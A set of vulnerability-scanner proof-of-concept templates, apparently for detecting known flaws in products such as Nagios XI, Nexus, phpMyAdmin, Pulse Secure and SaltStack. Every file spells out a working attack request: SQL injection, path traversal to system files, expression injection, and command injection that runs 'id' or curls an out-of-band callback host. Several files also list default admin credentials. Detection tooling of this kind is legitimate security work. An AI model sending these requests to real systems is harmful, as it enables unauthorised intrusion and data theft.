path: /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{r}}))%23 7 | follow_redirects: false 8 | expression: | 9 | response.body.bcontains(bytes(md5(string(r)))) 10 | detail: 11 | author: 0x_zmz(github.com/0x-zmz) 12 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 13 | links: 14 | - https://www.seebug.org/vuldb/ssvid-97265 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10736 16 | -------------------------------------------------------------------------------- /pkg/pocs/nagio-cve-2018-10736.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10736 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{r}}))%23 7 | follow_redirects: false 8 | expression: | 9 | response.body.bcontains(bytes(md5(string(r)))) 10 | detail: 11 | author: 0x_zmz(github.com/0x-zmz) 12 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 13 | links: 14 | - https://www.seebug.org/vuldb/ssvid-97266 15 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10736 16 | -------------------------------------------------------------------------------- /pkg/pocs/nagio-cve-2018-10737.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10737 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /nagiosql/admin/logbook.php 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: 10 | txtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{r}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# 11 | follow_redirects: false 12 | expression: | 13 | response.body.bcontains(bytes(md5(string(r)))) 14 | detail: 15 | author: 0x_zmz(github.com/0x-zmz) 16 | Affected Version: "Nagios XI 
5.2.x以及小于5.4.13的5.4.x" 17 | links: 18 | - https://www.seebug.org/vuldb/ssvid-97267 19 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10737 20 | -------------------------------------------------------------------------------- /pkg/pocs/nagio-cve-2018-10738.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nagio-cve-2018-10738 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /nagiosql/admin/menuaccess.php 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: 10 | selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{r}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# 11 | follow_redirects: false 12 | expression: | 13 | response.body.bcontains(bytes(md5(string(r)))) 14 | detail: 15 | author: 0x_zmz(github.com/0x-zmz) 16 | Affected Version: "Nagios XI 5.2.x以及小于5.4.13的5.4.x" 17 | links: 18 | - https://www.seebug.org/vuldb/ssvid-97268 19 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10738 20 | -------------------------------------------------------------------------------- /pkg/pocs/netgear-cve-2017-5521.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-netgear-cve-2017-5521 2 | rules: 3 | - method: POST 4 | path: /passwordrecovered.cgi?id=get_rekt 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "right\">Router\\s*Admin\\s*Username<".bmatches(response.body) && "right\">Router\\s*Admin\\s*Password<".bmatches(response.body) && response.body.bcontains(b"left") 8 | detail: 9 | author: betta(https://github.com/betta-cyber) 10 | links: 11 | - https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html 12 | -------------------------------------------------------------------------------- /pkg/pocs/nextjs-cve-2017-16877.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-nextjs-cve-2017-16877 2 | rules: 3 | - method: GET 4 | path: /_next/../../../../../../../../../../etc/passwd 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | version: <2.4.1 10 | author: Loneyer 11 | links: 12 | - https://github.com/Loneyers/vuldocker/tree/master/next.js 13 | - https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 14 | -------------------------------------------------------------------------------- /pkg/pocs/nexus-cve-2020-10199.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexus-cve-2020-10199 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: "/rest/beta/repositories/go/group" 8 | headers: 9 | Content-Type: application/json 10 | body: | 11 | {"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ {{r1}} * {{r2}} }"]}} 12 | expression: | 13 | response.status == 400 && response.body.bcontains(bytes(string(r1 * r2))) 14 | detail: 15 | Affected Version: "nexus<3.21.2" 16 | author: kingkk(https://www.kingkk.com/) 17 | links: 18 | - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb 19 | - https://www.cnblogs.com/magic-zero/p/12641068.html 20 | - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype 21 | - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 22 | -------------------------------------------------------------------------------- /pkg/pocs/nexus-cve-2020-10204.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexus-cve-2020-10204 2 | set: 3 | r1: 
randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: "/extdirect" 8 | headers: 9 | Content-Type: application/json 10 | body: | 11 | {"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{{{r1}}*{{r2}}}"]}],"type":"rpc","tid":28} 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 14 | detail: 15 | Affected Version: "nexus<3.21.2" 16 | author: kingkk(https://www.kingkk.com/) 17 | links: 18 | - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb 19 | - https://www.cnblogs.com/magic-zero/p/12641068.html 20 | - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 21 | -------------------------------------------------------------------------------- /pkg/pocs/nexus-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexus-default-password 2 | rules: 3 | - method: GET 4 | path: /nexus/service/siesta/capabilities 5 | expression: > 6 | response.status == 401 7 | - method: GET 8 | path: /nexus/service/local/authentication/login 9 | headers: 10 | Accept: application/json 11 | Authorization: Basic YWRtaW46YWRtaW4xMjM= 12 | expression: > 13 | response.status == 200 14 | - method: GET 15 | path: /nexus/service/siesta/capabilities 16 | expression: > 17 | response.status == 200 18 | detail: 19 | author: Soveless(https://github.com/Soveless) 20 | Affected Version: "Nexus Repository Manager OSS" 21 | links: 22 | - https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager -------------------------------------------------------------------------------- 
/pkg/pocs/nexusdb-cve-2020-24571-path-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nexusdb-cve-2020-24571-path-traversal 2 | rules: 3 | - method: GET 4 | path: /../../../../../../../../windows/win.ini 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(bytes("[extensions]")) && response.content_type.contains("application/octet-stream") 8 | detail: 9 | author: su(https://suzzz112113.github.io/#blog) 10 | links: 11 | - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 -------------------------------------------------------------------------------- /pkg/pocs/nhttpd-cve-2019-16278.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nhttpd-cve-2019-16278 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: "/.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0" 8 | body: | 9 | echo 10 | echo 11 | expr {{r1}} + {{r2}} 2>&1 12 | expression: > 13 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 14 | 15 | detail: 16 | author: Loneyer 17 | versions: <= 1.9.6 18 | links: 19 | - https://git.sp0re.sh/sp0re/Nhttpd-exploits 20 | -------------------------------------------------------------------------------- /pkg/pocs/nps-default-password.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nps-default-password 2 | rules: 3 | - method: POST 4 | path: /login/verify 5 | body: username=admin&password=123 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"login success") 9 | -------------------------------------------------------------------------------- /pkg/pocs/nsfocus-uts-password-leak.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-nsfocus-uts-password-leak 2 | rules: 3 | - method: GET 4 | path: /webapi/v1/system/accountmanage/account 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"account") && response.body.bcontains(b"password") 8 | detail: 9 | author: MrP01ntSun(https://github.com/MrPointSun) 10 | links: 11 | - https://blog.csdn.net/DFMASTER/article/details/108547352 12 | -------------------------------------------------------------------------------- /pkg/pocs/nuuo-file-inclusion.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-nuuo-file-inclusion 2 | rules: 3 | - method: GET 4 | path: /css_parser.php?css=css_parser.php 5 | follow_redirects: false 6 | expression: response.status == 200 && response.headers["content-type"] == "text/css" && response.body.bcontains(b"$_GET['css']") 7 | detail: 8 | author: 2357000166(https://github.com/2357000166) 9 | links: 10 | - https://www.exploit-db.com/exploits/40211 -------------------------------------------------------------------------------- /pkg/pocs/openfire-cve-2019-18394-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-openfire-cve-2019-18394-ssrf 2 | rules: 3 | - method: GET 4 | path: /getFavicon?host=baidu.com/? 
5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.content_type.contains("image/x-icon") && response.body.bcontains(bytes("baidu.com")) 8 | detail: 9 | author: su(https://suzzz112113.github.io/#blog) 10 | links: 11 | - https://www.cnvd.org.cn/patchInfo/show/192993 12 | - https://www.cnblogs.com/potatsoSec/p/13437713.html 13 | -------------------------------------------------------------------------------- /pkg/pocs/pandorafms-cve-2019-20224-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-pandorafms-cve-2019-20224-rce 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | rules: 6 | - method: POST 7 | path: >- 8 | /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 9 | headers: 10 | Content-Type: application/x-www-form-urlencoded 11 | body: >- 12 | date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{reverseURL}}+%23&draw_button=Draw 13 | follow_redirects: true 14 | expression: | 15 | response.status == 200 && reverse.wait(5) 16 | detail: 17 | author: JingLing(https://hackfun.org/) 18 | version: Pandora FMS v7.0NG 19 | links: 20 | - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ 21 | -------------------------------------------------------------------------------- /pkg/pocs/php-cgi-cve-2012-1823.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-php-cgi-cve-2012-1823 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: POST 6 | path: /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input 7 | body: 8 | follow_redirects: false 9 | expression: | 10 | response.body.bcontains(bytes(md5(string(rand)))) 11 | detail: 12 | author: 17bdw 13 | links: 14 | - 
https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823 -------------------------------------------------------------------------------- /pkg/pocs/phpcms-cve-2018-19127.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpcms-cve-2018-19127 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: /type.php?template=tag_(){}%3b@unlink(file)%3becho md5($_GET[1])%3b{//../rss 7 | follow_redirects: true 8 | expression: | 9 | response.status == 200 10 | - method: GET 11 | path: /data/cache_template/rss.tpl.php?1={{r}} 12 | follow_redirects: true 13 | expression: | 14 | response.body.bcontains(bytes(md5(string(r)))) 15 | 16 | detail: 17 | author: pa55w0rd(www.pa55w0rd.online/) 18 | Affected Version: "PHPCMS2008" 19 | links: 20 | - https://github.com/ab1gale/phpcms-2008-CVE-2018-19127 21 | -------------------------------------------------------------------------------- /pkg/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion 2 | rules: 3 | - method: GET 4 | path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 5 | follow_redirects: false 6 | expression: >- 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | author: p0wd3r 10 | links: 11 | - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 12 | -------------------------------------------------------------------------------- /pkg/pocs/phpmyadmin-setup-deserialization.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpmyadmin-setup-deserialization 2 | rules: 3 | - method: POST 4 | path: /scripts/setup.php 5 | body: >- 6 | action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} 7 | follow_redirects: false 8 | expression: >- 9 | 
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 10 | detail: 11 | author: p0wd3r 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 14 | -------------------------------------------------------------------------------- /pkg/pocs/phpok-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpok-sqli 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: "/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{r1}}))) --+" 7 | expression: | 8 | response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) 9 | detail: 10 | author: jinqi 11 | links: 12 | - https://github.com/jinqi520 13 | -------------------------------------------------------------------------------- /pkg/pocs/phpshe-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpshe-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,CONCAT%28md5({{rand}})%29,4,5,6,7,8,9,10,11,12%23_ 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: hhdaddy 11 | Affected Version: "1.7" 12 | links: 13 | - https://www.cnblogs.com/Spec/p/10718046.html 14 | -------------------------------------------------------------------------------- /pkg/pocs/phpstudy-backdoor-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpstudy-backdoor-rce 2 | set: 3 | r: randomLowercase(6) 4 | payload: base64("printf(md5('" + r + "'));") 5 | rules: 6 | - method: GET 7 | path: /index.php 8 | headers: 9 | Accept-Encoding: 'gzip,deflate' 10 | Accept-Charset: '{{payload}}' 11 | follow_redirects: false 12 | expression: | 13 | response.body.bcontains(bytes(md5(r))) 14 | detail: 15 | 
author: 17bdw 16 | Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4" 17 | vuln_url: "php_xmlrpc.dll" 18 | links: 19 | - https://www.freebuf.com/column/214946.html -------------------------------------------------------------------------------- /pkg/pocs/phpunit-cve-2017-9841-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-phpunit-cve-2017-9841-rce 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 7 | body: 8 | follow_redirects: false 9 | expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 10 | detail: 11 | author: p0wd3r,buchixifan 12 | links: 13 | - https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841 -------------------------------------------------------------------------------- /pkg/pocs/powercreator-arbitrary-file-upload.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-powercreator-arbitrary-file-upload 2 | set: 3 | rand: randomInt(1000, 9999) 4 | content: randomLowercase(8) 5 | randname: randomLowercase(4) 6 | rules: 7 | - method: POST 8 | path: /upload/UploadResourcePic.ashx?ResourceID={{rand}} 9 | follow_redirects: false 10 | headers: 11 | Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136 12 | Content-Disposition: form-data;name="file1";filename="{{randname}}.aspx"; 13 | body: "-----------------------------20873900192357278038549710136\nContent-Disposition: form-data; name=\"file1\"; filename=\"{{randname}}.aspx\"\nContent-Type: image/jpeg\n\n{{content}}\n-----------------------------20873900192357278038549710136--" 14 | search: | 15 | (?P.+?).ASPX 16 | expression: response.status == 200 && response.body.bcontains(b".ASPX") 17 | - method: GET 18 | path: /ResourcePic/{{path}}.ASPX 19 | follow_redirects: false 20 | expression: 
response.status == 200 21 | detail: 22 | author: MrP01ntSun(https://github.com/MrPointSun) 23 | links: 24 | - https://xz.aliyun.com/t/8478#reply-15684 25 | -------------------------------------------------------------------------------- /pkg/pocs/pulse-cve-2019-11510.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-pulse-cve-2019-11510 2 | rules: 3 | - method: GET 4 | path: >- 5 | /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 9 | detail: 10 | author: leezp 11 | Affected Version: "Pulse Connect Secure: 9.0RX 8.3RX 8.2RX" 12 | links: 13 | - https://github.com/jas502n/CVE-2019-11510-1 14 | - https://github.com/projectzeroindia/CVE-2019-11510 -------------------------------------------------------------------------------- /pkg/pocs/pyspider-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-pyspider-unauthorized-access 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: /debug/pyspidervulntest/run 8 | headers: 9 | Content-Type: application/x-www-form-urlencoded 10 | body: >- 11 | webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str({{r1}}+%2B+{{r2}}))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D 12 | follow_redirects: true 13 | expression: > 14 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 15 | detail: 16 | author: we1x4n(https://we1x4n.github.io/) 17 | links: 18 | - 
https://github.com/ianxtianxt/Pyspider-webui-poc 19 | -------------------------------------------------------------------------------- /pkg/pocs/qibocms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-qibocms-sqli 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /f/job.php?job=getzone&typeid=zone&fup=..\..\do\js&id=514125&webdb[web_open]=1&webdb[cache_time_js]=-1&pre=qb_label%20where%20lid=-1%20UNION%20SELECT%201,2,3,4,5,6,0,md5({{rand}}),9,10,11,12,13,14,15,16,17,18,19%23 7 | expression: | 8 | response.body.bcontains(bytes(md5(string(rand)))) 9 | detail: 10 | author: Rexus 11 | links: 12 | - https://www.ld-fcw.com/ 13 | -------------------------------------------------------------------------------- /pkg/pocs/qnap-cve-2019-7192.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-qnap-cve-2019-7192 2 | rules: 3 | - method: POST 4 | path: /photo/p/api/album.php 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: a=setSlideshow&f=qsamplealbum 8 | expression: | 9 | response.status == 200 10 | search: >- 11 | (?P.*?) 
12 | - method: GET 13 | path: /photo/slideshow.php?album={{album_id}} 14 | expression: | 15 | response.status == 200 16 | search: >- 17 | encodeURIComponent\(\'(?P.*?)\'\) 18 | - method: POST 19 | path: /photo/p/api/video.php 20 | headers: 21 | Content-Type: application/x-www-form-urlencoded 22 | body: album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=./../../../../../etc/passwd 23 | expression: | 24 | response.status == 200 && response.body.bcontains(b"admin:x:0:0") 25 | detail: 26 | author: Hzllaga 27 | links: 28 | - https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit 29 | -------------------------------------------------------------------------------- /pkg/pocs/rails-cve-2018-3760-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-rails-cve-2018-3760-rce 2 | rules: 3 | - method: GET 4 | path: '/assets/file:%2f%2f/etc/passwd' 5 | follow_redirects: false 6 | expression: | 7 | response.status == 500 && response.body.bcontains(b"FileOutsidePaths") 8 | search: '/etc/passwd is no longer under a load path: (?P.*?),' 9 | - method: GET 10 | path: >- 11 | /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 12 | follow_redirects: false 13 | expression: | 14 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 15 | detail: 16 | author: leezp 17 | Affected Version: "Sprockets<=3.7.1" 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760 20 | -------------------------------------------------------------------------------- /pkg/pocs/razor-cve-2018-8770.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-razor-cve-2018-8770 2 | rules: 3 | - method: GET 4 | path: /tests/generate.php 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ") && 
response.body.bcontains(b"/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line") 8 | detail: 9 | author: we1x4n(https://we1x4n.github.io/) 10 | links: 11 | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770 12 | - https://www.exploit-db.com/exploits/44495/ 13 | -------------------------------------------------------------------------------- /pkg/pocs/rconfig-cve-2019-16663.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-rconfig-cve-2019-16663 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: GET 7 | path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Bexpr%20{{r}}%20%2B%20{{r1}}%20%20%23 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string(r + r1))) 10 | detail: 11 | author: 17bdw 12 | links: 13 | - https://github.com/rconfig/rconfig/commit/6ea92aa307e20f0918ebd18be9811e93048d5071 14 | - https://www.cnblogs.com/17bdw/p/11840588.html 15 | - https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ -------------------------------------------------------------------------------- /pkg/pocs/resin-cnnvd-200705-315.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-cnnvd-200705-315 2 | rules: 3 | - method: GET 4 | path: /%20../web-inf/ 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b"/ ../web-inf/") && response.body.bcontains(b"Directory of /") 8 | detail: 9 | author: whynot(https://github.com/notwhy) 10 | links: 11 | - https://www.secpulse.com/archives/39144.html 12 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315 -------------------------------------------------------------------------------- /pkg/pocs/resin-inputfile-fileread-or-ssrf.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-inputfile-fileread-or-ssrf 2 | rules: 3 | - method: GET 4 | path: /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes("<%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %>")) 8 | detail: 9 | author: whynot(https://github.com/notwhy) 10 | links: 11 | - https://www.secpulse.com/archives/496.html -------------------------------------------------------------------------------- /pkg/pocs/resin-viewfile-fileread.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-resin-viewfile-fileread 2 | rules: 3 | - method: GET 4 | path: /resin-doc/viewfile/?file=index.jsp 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes("%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %")) 8 | detail: 9 | author: whynot(https://github.com/notwhy) 10 | links: 11 | - https://www.cnvd.org.cn/flaw/show/CNVD-2006-3205 12 | - http://0day5.com/archives/1173/ -------------------------------------------------------------------------------- /pkg/pocs/ruijie-eg-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ruijie-eg-rce 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | 6 | rules: 7 | - method: POST 8 | path: /guest_auth/guestIsUp.php 9 | body: mac=1&ip=127.0.0.1|curl+{{reverseURL}} 10 | expression: | 11 | reverse.wait(5) 12 | detail: 13 | author: pa55w0rd(www.pa55w0rd.online/) 14 | links: 15 | - https://github.com/Tas9er/EgGateWayGetShell 16 | - https://www.t00ls.net/thread-59334-1-1.html -------------------------------------------------------------------------------- /pkg/pocs/saltstack-cve-2020-16846.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-saltstack-cve-2020-16846 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | 6 | rules: 7 | - method: POST 8 | path: /run 9 | body: token=12312&client=ssh&tgt=*&fun=a&roster=aaa&ssh_priv=aaa|curl+{{reverseURL}}%3b 10 | expression: | 11 | reverse.wait(5) 12 | 13 | detail: 14 | author: we1x4n(https://we1x4n.com/) 15 | links: 16 | - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag 17 | - https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-16846/README.zh-cn.md 18 | -------------------------------------------------------------------------------- /pkg/pocs/samsung-wea453e-default-pwd.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-samsung-wea453e-default-pwd 2 | rules: 3 | - method: POST 4 | path: /main.ehp 5 | follow_redirects: false 6 | body: | 7 | httpd;General;lang=en&login_id=root&login_pw=sweap12~ 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes("document.formParent2.changepasswd1.value")) && response.body.bcontains(bytes("passwd_change.ehp")) 10 | detail: 11 | author: sharecast 12 | links: 13 | - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ 14 | -------------------------------------------------------------------------------- /pkg/pocs/samsung-wea453e-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-samsung-wea453e-rce 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(1140000, 1144800) 5 | rules: 6 | - method: POST 7 | path: /(download)/tmp/1.txt 8 | follow_redirects: false 9 | body: | 10 | command1=shell%3Aexpr {{r1}} - {{r2}}|dd of=/tmp/1.txt 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) 13 | detail: 14 | author: sharecast 15 | links: 16 | - 
https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ 17 | -------------------------------------------------------------------------------- /pkg/pocs/sangfor-edr-arbitrary-admin-login.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-arbitrary-admin-login 2 | rules: 3 | - method: GET 4 | path: /ui/login.php?user=admin 5 | follow_redirects: false 6 | expression: > 7 | response.status == 302 && 8 | response.body.bcontains(b"/download/edr_installer_") && 9 | response.headers["Set-Cookie"] != "" 10 | detail: 11 | author: hilson 12 | links: 13 | - https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA 14 | -------------------------------------------------------------------------------- /pkg/pocs/sangfor-edr-cssp-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-cssp-rce 2 | rules: 3 | - method: POST 4 | path: /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 5 | headers: 6 | Content-Type: application/x-www-form-urlencoded 7 | body: >- 8 | {"params":"w=123\"'1234123'\"|id"} 9 | expression: > 10 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uid=0(root)") 11 | detail: 12 | author: x1n9Qi8 13 | Affected Version: "Sangfor EDR 3.2.17R1/3.2.21" 14 | links: 15 | - https://www.cnblogs.com/0day-li/p/13650452.html 16 | -------------------------------------------------------------------------------- /pkg/pocs/sangfor-edr-tool-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sangfor-edr-tool-rce 2 | set: 3 | r1: randomLowercase(8) 4 | r2: randomLowercase(8) 5 | rules: 6 | - method: GET 7 | path: "/tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}}" 8 | follow_redirects: false 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2)) 11 | detail: 12 | author: cookie 
